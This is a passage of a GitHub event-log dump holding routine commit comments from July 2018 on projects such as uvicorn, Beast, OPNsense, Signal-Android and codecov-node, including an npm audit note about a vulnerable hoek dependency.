class=\"advice\">\r\n\r\n\t\t\t<h4>Confusion and Frustation are your friend !</h4>\r\n\r\n\t\t\t<p>Whenever you start something new, when it comes to us easy we'll take it for granted! Always! When you put your blood, sweat, giving up going up with friends, sleep, and eating, it's yours forever.</p>\r\n\r\n\r\n\r\n\t\t\t<p>Life will always throw curve balls! Never give up on yourself, your purpose, and your dreams. Relying on someone else or something else to take care of you, just won't work.</p>\r\n\r\n\t\t\t\r\n\r\n\t\t\t<h4>Always see and know there's a light at the end of the tunnel</h4>\r\n\r\n\t\t\t<p> The above is sooo true!</p>\r\n\r\n\r\n\r\n\t\t\t<h4>Tackling code</h4>\r\n\r\n\r\n\r\n\t\t\t<p>When learning a new code language, it's best to break it into parts. Also don't forget to reward yourself EVERYtime you complete a new section. You deserve it!!</p>\r\n\r\n\t\t</div>\r\n\r\n    </section>\r\n\r\n\r\n\r\n\t<footer>\r\n\r\n\t\t<!-- replace Skillcrush with your name here -->\r\n\r\n    <p>&copy; Copyright AskAlicia-advice 2017.</p>\r\n\r\n\t</footer>\r\n\r\n</body>\r\n\r\n</html>\r\n© 2018 GitHub, Inc.\r\nTerms\r\nPrivacy\r\nSecurity\r\nStatus\r\nHelp\r\n \r\nContact GitHub\r\nAPI\r\nTraining\r\nShop\r\nBlog\r\nAbout\r\n\r\nPress h to open a hovercard with more details. "}},"created_at":"2018-07-07T19:09:39Z"}
{"id":"7932795364","type":"CommitCommentEvent","actor":{"login":"agamjain14"},"repo":{"name":"agamjain14/meanstackShoppingCart"},"payload":{"comment":{"id":29630620,"position":1,"line":1,"path":"README.md","commit_id":"320b2b0fac1008540dbce92bee2407c5364bf424","created_at":"2018-07-07T19:10:23Z","updated_at":"2018-07-07T19:10:23Z","author_association":"OWNER","body":"cart"}},"created_at":"2018-07-07T19:10:23Z"}
{"id":"7932796573","type":"CommitCommentEvent","actor":{"login":"pgjones"},"repo":{"name":"encode/uvicorn"},"payload":{"comment":{"id":29630623,"position":300,"line":300,"path":"uvicorn/protocols/http/h11.py","commit_id":"07c6c18945ab4f4167118e717e197adce3aee3da","created_at":"2018-07-07T19:11:26Z","updated_at":"2018-07-07T19:11:26Z","author_association":"CONTRIBUTOR","body":"@tomchristie I think the ASGI application should be able to receive a `http.disconnect` after the request body has been fully consumed. For example if the application is (possibly forever) streaming Server Sent Events to the client and the `send` calls all become no-ops how would it know when to stop?"}},"created_at":"2018-07-07T19:11:26Z"}
{"id":"7932797175","type":"CommitCommentEvent","actor":{"login":"Nate-Wilkins"},"repo":{"name":"Nate-Wilkins/dotfiles"},"payload":{"comment":{"id":29630624,"position":2,"line":2,"path":"bin/EDITOR","commit_id":"4c28e2d481d69832e83f686ebcaa246ff862d7a8","created_at":"2018-07-07T19:11:57Z","updated_at":"2018-07-07T19:11:57Z","author_association":"OWNER","body":"Thanks for the tip, really appreciate it!"}},"created_at":"2018-07-07T19:11:57Z"}
{"id":"7932797963","type":"CommitCommentEvent","actor":{"login":"Pinacolada64"},"repo":{"name":"Pinacolada64/ImageBBS"},"payload":{"comment":{"id":29630625,"position":null,"line":null,"path":null,"commit_id":"69ec3d3316d958b615fffb3c3c8f25c9a9424397","created_at":"2018-07-07T19:12:36Z","updated_at":"2018-07-07T19:12:36Z","author_association":"OWNER","body":"You don't have to do anything yet.\r\n\r\nI'm experimenting with using `++ copier` instead of `++ 2` because the screen display of the block being copied (which is the I/O buffer, too) doesn't overwrite the lightbar display. Plus, it has some &,16,x options that I'm not sure about.\r\n\r\nI suppose I should move this into a branch of its own."}},"created_at":"2018-07-07T19:12:36Z"}
{"id":"7932798642","type":"CommitCommentEvent","actor":{"login":"Nate-Wilkins"},"repo":{"name":"Nate-Wilkins/dotfiles"},"payload":{"comment":{"id":29630626,"position":2,"line":2,"path":"bin/EDITOR","commit_id":"4c28e2d481d69832e83f686ebcaa246ff862d7a8","created_at":"2018-07-07T19:13:12Z","updated_at":"2018-07-07T19:13:12Z","author_association":"OWNER","body":"I think this was remnants of me playing around with this. I've removed it."}},"created_at":"2018-07-07T19:13:12Z"}
{"id":"7932798662","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29630627,"position":483,"line":486,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-07T19:13:13Z","updated_at":"2018-07-07T19:13:13Z","author_association":"NONE","body":"What's even the point of that foreach loop ?"}},"created_at":"2018-07-07T19:13:13Z"}
{"id":"7932798767","type":"CommitCommentEvent","actor":{"login":"ezimic"},"repo":{"name":"ezimic/Image-Quality-Evaluation"},"payload":{"comment":{"id":29630628,"position":null,"line":null,"path":null,"commit_id":"81089b4bb316d5bc9d0a4fd764ccc199172d935c","created_at":"2018-07-07T19:13:19Z","updated_at":"2018-07-07T19:13:19Z","author_association":"OWNER","body":"Here are the steps to run the matlab code to predict image quality score for an image\r\n1. Download the zip file\r\n2. Load all the files in the zip file into same Matlab directory\r\n3.  Run the main file **ComputeQualityScore.m**\r\n4. You will be prompted to select an DICOM file in the Matlab directory\r\n5. After file selection, the algorithms runs to completion and predict image quality score for the selected DICOM file\r\n\r\n"}},"created_at":"2018-07-07T19:13:19Z"}
{"id":"7932799348","type":"CommitCommentEvent","actor":{"login":"polytypic"},"repo":{"name":"codecov/codecov-node"},"payload":{"comment":{"id":29630629,"position":9,"line":30,"path":"package.json","commit_id":"39dc2d8905dccd9357f30f2f095e962b3506e218","created_at":"2018-07-07T19:13:47Z","updated_at":"2018-07-07T19:13:47Z","author_association":"NONE","body":"This change makes it so that `codecov` now depends on a vulnerable version of `hoek`.  Here is what `npm audit` reports:\r\n\r\n```\r\n┌───────────────┬──────────────────────────────────────────────────────────────┐\r\n│ Moderate      │ Prototype pollution                                          │\r\n├───────────────┼──────────────────────────────────────────────────────────────┤\r\n│ Package       │ hoek                                                         │\r\n├───────────────┼──────────────────────────────────────────────────────────────┤\r\n│ Patched in    │ > 4.2.0 < 5.0.0 || >= 5.0.3                                  │\r\n├───────────────┼──────────────────────────────────────────────────────────────┤\r\n│ Dependency of │ codecov [dev]                                                │\r\n├───────────────┼──────────────────────────────────────────────────────────────┤\r\n│ Path          │ codecov > request > hawk > cryptiles > boom > hoek           │\r\n├───────────────┼──────────────────────────────────────────────────────────────┤\r\n│ More info     │ https://nodesecurity.io/advisories/566                       │\r\n└───────────────┴──────────────────────────────────────────────────────────────┘\r\n```"}},"created_at":"2018-07-07T19:13:47Z"}
{"id":"7932799430","type":"CommitCommentEvent","actor":{"login":"nbougalis"},"repo":{"name":"vinniefalco/beast"},"payload":{"comment":{"id":29630630,"position":23,"line":43,"path":"include/boost/beast/websocket/detail/hybi13.hpp","commit_id":"61afd699f370d7bcdbc7f3107b22df22d95ce3fe","created_at":"2018-07-07T19:13:52Z","updated_at":"2018-07-07T19:13:52Z","author_association":"NONE","body":"You can get a little extra performance here by changing the interface of `chacha<R>::operator()` to take a `uint32_t *` and to directly write 4 32-bit values in there, without the need for shifting and masking.\r\n\r\n```\r\nvoid chacha<R>::operator()(std::uint32_t *p, std::size_t c)\r\n{\r\n    while (c-- != 0)\r\n    {\r\n        if(idx_ == 16)\r\n        {\r\n            idx_ = 0;\r\n            ++ctr_;\r\n            generate_block();\r\n        }\r\n        *p++ = block_[idx_++];\r\n    }\r\n}\r\n```"}},"created_at":"2018-07-07T19:13:52Z"}
{"id":"7932799627","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29630632,"position":159,"line":310,"path":"docs/chapters/rules.tex","commit_id":"1271dfa34e7525d48696fa60d063ac1803418599","created_at":"2018-07-07T19:14:03Z","updated_at":"2018-07-07T19:14:03Z","author_association":"OWNER","body":"I think there's no need to mention, but you understand more about our users than I do! :wink: "}},"created_at":"2018-07-07T19:14:03Z"}
{"id":"7932800053","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29630633,"position":94,"line":165,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-07T19:14:25Z","updated_at":"2018-07-07T19:14:25Z","author_association":"NONE","body":"This debug management is unusable. Why not simply use IFF_DEBUG like virtually every other network module ?"}},"created_at":"2018-07-07T19:14:25Z"}
{"id":"7932800960","type":"CommitCommentEvent","actor":{"login":"PradyumnaShome"},"repo":{"name":"HackIllinois/api-gateway"},"payload":{"comment":{"id":29630635,"position":47,"line":65,"path":"services/decision.go","commit_id":"6467a95a1cbbacaf932f3d3c9d76a53bcb834ffe","created_at":"2018-07-07T19:15:14Z","updated_at":"2018-07-07T19:15:14Z","author_association":"CONTRIBUTOR","body":"`FinalizeDecision` is a `POST` endpoint, so this needs to be changed for proper routing."}},"created_at":"2018-07-07T19:15:14Z"}
{"id":"7932802129","type":"CommitCommentEvent","actor":{"login":"x-tec2017"},"repo":{"name":"Pinacolada64/ImageBBS"},"payload":{"comment":{"id":29630641,"position":null,"line":null,"path":null,"commit_id":"69ec3d3316d958b615fffb3c3c8f25c9a9424397","created_at":"2018-07-07T19:16:13Z","updated_at":"2018-07-07T19:16:13Z","author_association":"NONE","body":"Thanks for explaining.\n\nOn Sat, Jul 7, 2018, 3:12 PM Ryan Sherwood <notifications@github.com> wrote:\n\n> You don't have to do anything yet.\n>\n> I'm experimenting with using ++ copier instead of ++ 2 because the screen\n> display of the block being copied (which is the I/O buffer, too) doesn't\n> overwrite the lightbar display. Plus, it has some &,16,x options that I'm\n> not sure about.\n>\n> I suppose I should move this into a branch of its own.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Pinacolada64/ImageBBS/commit/69ec3d3316d958b615fffb3c3c8f25c9a9424397#commitcomment-29630625>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AganocV-QSNWHJb5VYBV_Aq0tn4LI1wdks5uEQgkgaJpZM4VF-qz>\n> .\n>\n"}},"created_at":"2018-07-07T19:16:13Z"}
{"id":"7932803573","type":"CommitCommentEvent","actor":{"login":"marcphilipp"},"repo":{"name":"junit-team/junit5"},"payload":{"comment":{"id":29630642,"position":37,"line":52,"path":"junit-platform-engine/src/main/java/org/junit/platform/engine/support/hierarchical/ThrowableCollector.java","commit_id":"1cae871204775b372e37457768383b1a0c64705f","created_at":"2018-07-07T19:17:24Z","updated_at":"2018-07-07T19:17:24Z","author_association":"MEMBER","body":"Good catch, thanks!"}},"created_at":"2018-07-07T19:17:24Z"}
{"id":"7932804027","type":"CommitCommentEvent","actor":{"login":"Zebshar"},"repo":{"name":"Zebshar/Anna-s-Website"},"payload":{"comment":{"id":29630643,"position":null,"line":null,"path":null,"commit_id":"a43f2e1f920ffddeabbf206094a7ce172bde943e","created_at":"2018-07-07T19:17:48Z","updated_at":"2018-07-07T19:17:48Z","author_association":"OWNER","body":"Hi! I'm using this as a pseudo server to host my website that I'm making to learn HTML CSS and Java! "}},"created_at":"2018-07-07T19:17:48Z"}
{"id":"7932804618","type":"CommitCommentEvent","actor":{"login":"kishkoltz"},"repo":{"name":"kishkoltz/Microblog"},"payload":{"comment":{"id":29630646,"position":null,"line":null,"path":null,"commit_id":"da5052eaac85da12010950be76f33d9f555f3e08","created_at":"2018-07-07T19:18:18Z","updated_at":"2018-07-07T19:18:18Z","author_association":"OWNER","body":"It is a standard practice to respond to a POST request generated by a web form submission with a redirect."}},"created_at":"2018-07-07T19:18:18Z"}
{"id":"7932805473","type":"CommitCommentEvent","actor":{"login":"IzzySoft"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29630647,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-07T19:19:02Z","updated_at":"2018-07-07T19:19:02Z","author_association":"NONE","body":"You forgot to also increase `versionCode`, hence this version never made it to F-Droid. You've increased it meanwhile at 3487806 – but the tag was not adjusted to that. So could you please retag (or create a new tag), so F-Droid can pick it up? Thanks!"}},"created_at":"2018-07-07T19:19:02Z"}
{"id":"7932806886","type":"CommitCommentEvent","actor":{"login":"RiseT"},"repo":{"name":"signalapp/Signal-Android"},"payload":{"comment":{"id":29630650,"position":133,"line":133,"path":"src/org/thoughtcrime/securesms/contactshare/ContactFieldAdapter.java","commit_id":"54dbffaf300c8c29ce61e756ad7d2f9cbc2a776e","created_at":"2018-07-07T19:20:17Z","updated_at":"2018-07-07T19:20:17Z","author_association":"CONTRIBUTOR","body":"@greyson-signal \r\nRegarding the potential bug mentioned on the community forum:\r\nhttps://community.signalusers.org/t/sharing-contacts-potential-bugs/3462/2\r\n\r\nDon't know anything about Java and not much about coding, but is it possible that this should read:\r\n\r\n    label = phoneNumber.getLabel() != null ? phoneNumber.getLabel() : context.getString(R.string.ContactShareEditActivity_type_missing);"}},"created_at":"2018-07-07T19:20:17Z"}
{"id":"7932806973","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29630651,"position":483,"line":486,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-07T19:20:21Z","updated_at":"2018-07-07T19:20:21Z","author_association":"NONE","body":"ah ok, it is to find an ia4 that matches... I am beginning to be tired."}},"created_at":"2018-07-07T19:20:21Z"}
{"id":"7932807141","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29630652,"position":null,"line":null,"path":null,"commit_id":"de258ed94866de545c0d297e2d839a2936de21e6","created_at":"2018-07-07T19:20:29Z","updated_at":"2018-07-07T19:20:29Z","author_association":"CONTRIBUTOR","body":"Any updates on this front?"}},"created_at":"2018-07-07T19:20:29Z"}
{"id":"7932807285","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29630653,"position":null,"line":null,"path":null,"commit_id":"d764ca6ab9358627c2fdcbefd40851dc74b850ba","created_at":"2018-07-07T19:20:36Z","updated_at":"2018-07-07T19:20:36Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2972 of 2973 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-07T19:20:36Z"}
{"id":"7932809386","type":"CommitCommentEvent","actor":{"login":"RiseT"},"repo":{"name":"signalapp/Signal-Android"},"payload":{"comment":{"id":29630655,"position":157,"line":157,"path":"src/org/thoughtcrime/securesms/contactshare/ContactFieldAdapter.java","commit_id":"54dbffaf300c8c29ce61e756ad7d2f9cbc2a776e","created_at":"2018-07-07T19:22:23Z","updated_at":"2018-07-07T19:22:23Z","author_association":"CONTRIBUTOR","body":"@greyson-signal \r\nSame here.\r\n\r\n    "}},"created_at":"2018-07-07T19:22:23Z"}
{"id":"7932816605","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29630675,"position":18,"line":18,"path":"_projects/i_gitt_scm_support.md","commit_id":"4088d8682e38cae35bdd1b7e822b219c07daef9a","created_at":"2018-07-07T19:28:42Z","updated_at":"2018-07-07T19:28:42Z","author_association":"NONE","body":"`coala-bears`"}},"created_at":"2018-07-07T19:28:42Z"}
{"id":"7932816872","type":"CommitCommentEvent","actor":{"login":"tomchristie"},"repo":{"name":"encode/uvicorn"},"payload":{"comment":{"id":29630676,"position":300,"line":300,"path":"uvicorn/protocols/http/h11.py","commit_id":"07c6c18945ab4f4167118e717e197adce3aee3da","created_at":"2018-07-07T19:28:56Z","updated_at":"2018-07-07T19:28:56Z","author_association":"MEMBER","body":"Fair point. Could you link me to the SSE extension docs, or PR, or whatever? Not seeing it at the moment? It might be that I need to have a look at h2 before I come to a judgement on this. Wanna open an issue so I don’t loose track of it?"}},"created_at":"2018-07-07T19:28:56Z"}
{"id":"7932817296","type":"CommitCommentEvent","actor":{"login":"dave11111"},"repo":{"name":"jamesmontemagno/CurrentActivityPlugin"},"payload":{"comment":{"id":29630678,"position":51,"line":34,"path":"nuget/readme.txt","commit_id":"aa512551bec0f8ead293d080bc0b496e624fd557","created_at":"2018-07-07T19:29:17Z","updated_at":"2018-07-07T19:29:17Z","author_association":"NONE","body":"[assembly: UsesFeature(\"android.hardware.wifi\", Required = false)]"}},"created_at":"2018-07-07T19:29:17Z"}
{"id":"7932818146","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29630681,"position":830,"line":1015,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-07T19:30:06Z","updated_at":"2018-07-07T19:30:06Z","author_association":"NONE","body":"So... somewhere in this function there is a bug that makes it return ip 0.0.0.0 with an ipv6 prefix length of 28 and an ipv4 prefix of 32... making it an ipv6 subnet /60 reminder = 4.\r\nThere are way too many variables for me to find it readable an far too few comments on what they are actually trying to do with 3 in6_addr as input in a function that should be extracting a single ipv4 from a single ipv6..."}},"created_at":"2018-07-07T19:30:06Z"}
{"id":"7932818534","type":"CommitCommentEvent","actor":{"login":"Mahamatnour"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29630684,"position":null,"line":null,"path":null,"commit_id":"952710d08e817861e515139549a9d840e7afb086","created_at":"2018-07-07T19:30:20Z","updated_at":"2018-07-07T19:30:20Z","author_association":"NONE","body":"Great. Keep Learning 👍 "}},"created_at":"2018-07-07T19:30:20Z"}
{"id":"7932819027","type":"CommitCommentEvent","actor":{"login":"vinniefalco"},"repo":{"name":"vinniefalco/beast"},"payload":{"comment":{"id":29630687,"position":23,"line":43,"path":"include/boost/beast/websocket/detail/hybi13.hpp","commit_id":"61afd699f370d7bcdbc7f3107b22df22d95ce3fe","created_at":"2018-07-07T19:30:45Z","updated_at":"2018-07-07T19:30:45Z","author_association":"OWNER","body":"But then `chacha` is no longer a **RandomNumberEngine**"}},"created_at":"2018-07-07T19:30:45Z"}
{"id":"7932819301","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29630689,"position":33,"line":33,"path":"_projects/i_gitt_scm_support.md","commit_id":"4088d8682e38cae35bdd1b7e822b219c07daef9a","created_at":"2018-07-07T19:30:55Z","updated_at":"2018-07-07T19:30:55Z","author_association":"NONE","body":"Typo"}},"created_at":"2018-07-07T19:30:55Z"}
{"id":"7932819580","type":"CommitCommentEvent","actor":{"login":"dave11111"},"repo":{"name":"jamesmontemagno/CurrentActivityPlugin"},"payload":{"comment":{"id":29630691,"position":4,"line":44,"path":"README.md","commit_id":"aa512551bec0f8ead293d080bc0b496e624fd557","created_at":"2018-07-07T19:31:07Z","updated_at":"2018-07-07T19:31:07Z","author_association":"NONE","body":"[assembly: UsesFeature(\"android.hardware.wifi\", Required = false)]"}},"created_at":"2018-07-07T19:31:07Z"}
{"id":"7932820592","type":"CommitCommentEvent","actor":{"login":"dave11111"},"repo":{"name":"jamesmontemagno/CurrentActivityPlugin"},"payload":{"comment":{"id":29630693,"position":8,"line":7,"path":"nuget/readme.txt","commit_id":"aa512551bec0f8ead293d080bc0b496e624fd557","created_at":"2018-07-07T19:31:56Z","updated_at":"2018-07-07T19:31:56Z","author_association":"NONE","body":"[assembly: UsesFeature(\"android.hardware.wifi\", Required = false)]"}},"created_at":"2018-07-07T19:31:56Z"}
{"id":"7932820635","type":"CommitCommentEvent","actor":{"login":"vinniefalco"},"repo":{"name":"vinniefalco/beast"},"payload":{"comment":{"id":29630694,"position":29,"line":123,"path":"include/boost/beast/websocket/detail/stream_base.hpp","commit_id":"61afd699f370d7bcdbc7f3107b22df22d95ce3fe","created_at":"2018-07-07T19:31:58Z","updated_at":"2018-07-07T19:31:58Z","author_association":"OWNER","body":"**ChaCha8** is definitely not OK. The default behavior is to use the secure PRNG which is ChaCha20. Callers can turn off security by calling `websocket::stream::secure_prng(false)`, and it will use `std::minstd_rand`."}},"created_at":"2018-07-07T19:31:58Z"}
{"id":"7932820701","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29630695,"position":null,"line":null,"path":null,"commit_id":"0c3020425652812333b3b6374ec91a2d453d0da5","created_at":"2018-07-07T19:32:02Z","updated_at":"2018-07-07T19:32:02Z","author_association":"CONTRIBUTOR","body":"yep double checked...\r\n\r\n```\r\n  .Popover-message--top-right:before,\r\n  .Popover-message--top-left:before {\r\n\tborder-bottom-color: #343434 !important;\r\n  }\r\n```\r\n\r\nare not anywhere"}},"created_at":"2018-07-07T19:32:02Z"}
{"id":"7932821719","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29630696,"position":35,"line":35,"path":"_projects/i_gitt_scm_support.md","commit_id":"4088d8682e38cae35bdd1b7e822b219c07daef9a","created_at":"2018-07-07T19:32:54Z","updated_at":"2018-07-07T19:32:54Z","author_association":"NONE","body":"I think this is more to  \"The participant has a merged enhancement to IGitt\", since only maintainers can merge \"merge request\" to the master"}},"created_at":"2018-07-07T19:32:54Z"}
{"id":"7932822154","type":"CommitCommentEvent","actor":{"login":"dave11111"},"repo":{"name":"jamesmontemagno/CurrentActivityPlugin"},"payload":{"comment":{"id":29630698,"position":8,"line":7,"path":"nuget/readme.txt","commit_id":"aa512551bec0f8ead293d080bc0b496e624fd557","created_at":"2018-07-07T19:33:16Z","updated_at":"2018-07-07T19:33:16Z","author_association":"NONE","body":"+#\r\n"}},"created_at":"2018-07-07T19:33:16Z"}
{"id":"7932822162","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29630699,"position":40,"line":40,"path":"_projects/i_gitt_scm_support.md","commit_id":"4088d8682e38cae35bdd1b7e822b219c07daef9a","created_at":"2018-07-07T19:33:17Z","updated_at":"2018-07-07T19:33:17Z","author_association":"NONE","body":"Don't forget the dot ;)"}},"created_at":"2018-07-07T19:33:17Z"}
{"id":"7932822332","type":"CommitCommentEvent","actor":{"login":"a9x26j8i"},"repo":{"name":"a9x26j8i/LeetCode"},"payload":{"comment":{"id":29630700,"position":null,"line":null,"path":null,"commit_id":"c00e9091480fce8324b823dfdbad6f9491dae5e9","created_at":"2018-07-07T19:33:27Z","updated_at":"2018-07-07T19:33:27Z","author_association":"OWNER","body":"overflow detection: compare with the former one"}},"created_at":"2018-07-07T19:33:27Z"}
{"id":"7932822335","type":"CommitCommentEvent","actor":{"login":"pgjones"},"repo":{"name":"encode/uvicorn"},"payload":{"comment":{"id":29630701,"position":300,"line":300,"path":"uvicorn/protocols/http/h11.py","commit_id":"07c6c18945ab4f4167118e717e197adce3aee3da","created_at":"2018-07-07T19:33:28Z","updated_at":"2018-07-07T19:33:28Z","author_association":"CONTRIBUTOR","body":"This is the [SSE Standard](https://html.spec.whatwg.org/multipage/server-sent-events.html) and [here](https://gitlab.com/pgjones/quart/blob/master/examples/broadcast/broadcast.py) is a simple example in Quart. As I understand it it works for HTTP/1 as well. I'll open a PR."}},"created_at":"2018-07-07T19:33:28Z"}
{"id":"7932823338","type":"CommitCommentEvent","actor":{"login":"dave11111"},"repo":{"name":"jamesmontemagno/CurrentActivityPlugin"},"payload":{"comment":{"id":29630704,"position":36,"line":22,"path":"nuget/readme.txt","commit_id":"aa512551bec0f8ead293d080bc0b496e624fd557","created_at":"2018-07-07T19:34:22Z","updated_at":"2018-07-07T19:34:22Z","author_association":"NONE","body":"[assembly: UsesFeature(\"android.hardware.wifi\", Required = false)]"}},"created_at":"2018-07-07T19:34:22Z"}
{"id":"7932824119","type":"CommitCommentEvent","actor":{"login":"dave11111"},"repo":{"name":"jamesmontemagno/CurrentActivityPlugin"},"payload":{"comment":{"id":29630709,"position":36,"line":22,"path":"nuget/readme.txt","commit_id":"aa512551bec0f8ead293d080bc0b496e624fd557","created_at":"2018-07-07T19:35:03Z","updated_at":"2018-07-07T19:35:03Z","author_association":"NONE","body":"[assembly: UsesFeature(\"android.hardware.wifi\", Required = false)]"}},"created_at":"2018-07-07T19:35:03Z"}
{"id":"7932824682","type":"CommitCommentEvent","actor":{"login":"joshmh"},"repo":{"name":"lamassu/lamassu-machine"},"payload":{"comment":{"id":29630711,"position":null,"line":null,"path":null,"commit_id":"985e9900fd9b3aceb78a4cc97084a2d7e0b43eae","created_at":"2018-07-07T19:35:31Z","updated_at":"2018-07-07T19:35:31Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Sintra - setting bit to dispense polymer notes on F53](https://trello.com/c/SKg2FuSK/550-sintra-setting-bit-to-dispense-polymer-notes-on-f53)"}},"created_at":"2018-07-07T19:35:31Z"}
{"id":"7932824935","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29630712,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-07T19:35:44Z","updated_at":"2018-07-07T19:35:44Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |\n|---|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-07T19:35:44Z"}
{"id":"7932825650","type":"CommitCommentEvent","actor":{"login":"dave11111"},"repo":{"name":"jamesmontemagno/CurrentActivityPlugin"},"payload":{"comment":{"id":29630714,"position":48,"line":31,"path":"nuget/readme.txt","commit_id":"aa512551bec0f8ead293d080bc0b496e624fd557","created_at":"2018-07-07T19:36:23Z","updated_at":"2018-07-07T19:36:23Z","author_association":"NONE","body":"[assembly: UsesFeature(\"android.hardware.wifi\", Required = false)]\r\n\r\n"}},"created_at":"2018-07-07T19:36:23Z"}
{"id":"7932826897","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29630716,"position":41,"line":41,"path":"NET.S.2018.Lyubchenko.04/DoubleToBinary/DoubleToBinary.cs","commit_id":"c7bba2b50a94542e32594c0ba8da7eb0588efec8","created_at":"2018-07-07T19:37:28Z","updated_at":"2018-07-07T19:37:28Z","author_association":"NONE","body":"Здесь имеет смысл сделать приватными поля, и предоставить соответствующие свойства (подумать какие)."}},"created_at":"2018-07-07T19:37:28Z"}
{"id":"7932827572","type":"CommitCommentEvent","actor":{"login":"Celelibi"},"repo":{"name":"mltframework/mlt"},"payload":{"comment":{"id":29630718,"position":null,"line":null,"path":null,"commit_id":"7bf5da86d4f2f8f83f45b9809fb061cbfdd97906","created_at":"2018-07-07T19:38:01Z","updated_at":"2018-07-07T19:38:01Z","author_association":"NONE","body":"For what it's worth, I've spent some time trying to identify the bug and submitted the issues #351."}},"created_at":"2018-07-07T19:38:01Z"}
{"id":"7932830089","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/dcm2niix-feedstock"},"payload":{"comment":{"id":29630722,"position":null,"line":null,"path":null,"commit_id":"6795d3c9cd31717e7959a6ba85119bca973dcc04","created_at":"2018-07-07T19:40:13Z","updated_at":"2018-07-07T19:40:13Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ningfei, @neurolabusc were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @ningfei, @neurolabusc were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-07T19:40:13Z"}
{"id":"7932830531","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29630723,"position":3,"line":3,"path":"_projects/i_gitt_scm_support.md","commit_id":"4088d8682e38cae35bdd1b7e822b219c07daef9a","created_at":"2018-07-07T19:40:35Z","updated_at":"2018-07-07T19:40:35Z","author_association":"NONE","body":"I think \"... convert coala VCS bears to use IGitt\" might be better"}},"created_at":"2018-07-07T19:40:35Z"}
